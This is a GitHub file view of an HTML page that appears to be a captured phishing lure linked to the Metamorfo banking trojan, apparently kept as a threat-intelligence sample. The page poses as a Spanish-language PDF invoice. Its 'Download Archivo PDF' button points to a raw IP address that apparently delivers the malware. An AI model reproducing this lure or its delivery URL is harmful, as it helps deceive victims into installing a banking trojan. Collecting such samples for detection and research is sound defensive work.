-
Notifications
You must be signed in to change notification settings - Fork 6
/
2023-11-24_Metamorfo_PDFLure
62 lines (55 loc) · 1.63 KB
/
2023-11-24_Metamorfo_PDFLure
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Documento Factura - </title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
display: flex;
align-items: center;
justify-content: center;
height: 100vh;
margin: 0;
}
.container {
text-align: center;
padding: 20px;
background-color: #fff;
border-radius: 8px;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
}
.logo {
width: 100px;
height: auto;
}
.download-button {
background-color: #007BFF;
color: #fff;
padding: 10px 20px;
border: none;
border-radius: 4px;
font-size: 18px;
cursor: pointer;
margin-top: 80px; /* Espaço entre o botão e o texto */
transition: box-shadow 0.3s ease; /* Transição suave da sombra */
}
.download-button:hover {
background-color: #0056b3;
}
.download-button:focus {
box-shadow: 0 0 4px rgba(0, 0, 0, 0.2); /* Sombra quando focado */
}
</style>
</head>
<body>
<div class="container">
<img class="logo" src="pdf.png" alt="Logo PDF">
<h2>Documento PDF</h2>
<p>Emission - 24/11/2023 01:06:25</p>
<a class="download-button" href="http://38.60.224.150/arvbs/index.php?va">Download Archivo PDF</a>
</div>
</body>
</html>